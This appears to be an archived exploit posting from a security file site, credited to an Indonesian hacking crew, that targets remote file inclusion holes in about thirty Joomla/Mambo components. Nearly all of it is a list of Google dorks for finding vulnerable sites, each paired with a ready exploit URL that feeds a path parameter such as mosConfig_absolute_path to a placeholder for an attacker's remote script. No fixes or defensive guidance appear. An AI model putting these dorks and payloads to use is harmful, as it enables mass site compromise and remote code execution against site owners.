Joomla Components Remote File Inclusion

Joomla Components Remote File Inclusion: Posted Oct 13, 2010; Authored by jos_ali_joe; This advisory documents a large amount of remote file inclusion vulnerabilities in numerous Joomla components.; tags | exploit, remote, vulnerability, code execution, file inclusion; SHA-256 | 58b131c80a539ceae3408fb3b0abcf155b28e84326413db44b9b2eb5a5ab76a6; Download | Favorite | View
Joomla Components Remote File Inclusion

#######################################################################################################################################
##                                 
##.___             .___                                .__                 _________              .___                
##|   |  ____    __| _/  ____    ____    ____    ______|__|_____     ____  \_   ___ \   ____    __| _/  ____  _______ 
##|   | /    \  / __ |  /  _ \  /    \ _/ __ \  /  ___/|  |\__  \   /    \ /    \  \/  /  _ \  / __ | _/ __ \ \_  __ \
##|   ||   |  \/ /_/ | (  <_> )|   |  \\  ___/  \___ \ |  | / __ \_|   |  \\     \____(  <_> )/ /_/ | \  ___/  |  | \/
##|___||___|  /\____ |  \____/ |___|  / \___  >/____  >|__|(____  /|___|  / \______  / \____/ \____ |  \___  > |__|   
##          \/      \/              \/      \/      \/          \/      \/         \/              \/      \/         
##  
##                                                                Exploit By jos_ali_joe Indonesian Coder Team[at]2010. Mail : josalijoe@yahoo.com
##
########################################################################################################################################                


########################################################################################################################################                          


[+] Dork : inurl:index.php?option=”com_a6mambocredits”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_a6mambohelpdesk”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_admin”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_akocomment”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/akocomments.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_artlinks”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_colophon”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_comprofiler”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_cpg”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_cpg/cpg.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_cropimage”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_extended_registration”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_fm”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_fm/fm.install.php?lm_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_galleria”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_kochsuite”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_linkdirectory”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_loudmounth”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_madeira”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_madeira/img.php?url=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_mambatstaff”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_mambelfish”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_mmp”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_moodle”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_moodle/moodle.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_mospray”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_mospray/scripts/admin.php?basedir=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_multibanners”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_pcchess”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_peoplebook”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_performs”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_performs/performs.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_reporter”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_securityimages”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_securityimages/configinsert.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_admin”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_simpleboard/file_upload.php?sbp=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_sitemap”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_smf”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/components/com_smf/smf.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_uhp”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

[+] Dork : inurl:index.php?option=”com_webring”

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/administrator/components/com_webring/admin.webring.docs.php?component_dir=[IndonesianCoder]

---------------------------------------------------------------------------



########################################################################################################################################                     


Thanks :

./kaMtiEz – ibl13Z – Xrobot – tukulesto – N4ck0 – R3m1ck – jundab - asickboys- Vyc0d – Yur4kha

./ArRay – akatsuchi – K4pt3N – Gameover – antitos – yuki – pokeng – ffadill - Aury – aphe-aphe - Alecs

./Kiddies – pL4nkt0n – chaer newbie – andriecom – Abu_adam – Petimati - hakz – Virgi – Anharku – TeRRenJr

Greets For :

./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker

My Team : ./Indonesian Coder

NOTE :

[+] kapan ya icha bener2 bisa sayang sama gw . :(
Top Authors In Last 30 Days

Red Hat 114 files
Ubuntu 98 files
Debian 14 files
Rafael Pedrero 11 files
Apple 9 files
Google Security Research 9 files
Abdulhakim Oner 8 files
nu11secur1ty 8 files
Hubert Wojciechowski 6 files
Sarang Tumne 5 files
File Archives

Systems

AIX (426)
Apple (1,960)
BSD (372)
CentOS (56)
Cisco (1,919)
Debian (6,715)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,288)
HPUX (878)
iOS (340)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,153)
Mac OS X (684)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (12,930)
Slackware (941)
Solaris (1,609)
SUSE (1,444)
Ubuntu (8,462)
UNIX (9,208)
UnixWare (185)
Windows (6,533)
Other
Joomla Components Remote File Inclusion

Joomla Components Remote File Inclusion

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Components Remote File Inclusion

Share This

Joomla Components Remote File Inclusion

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems
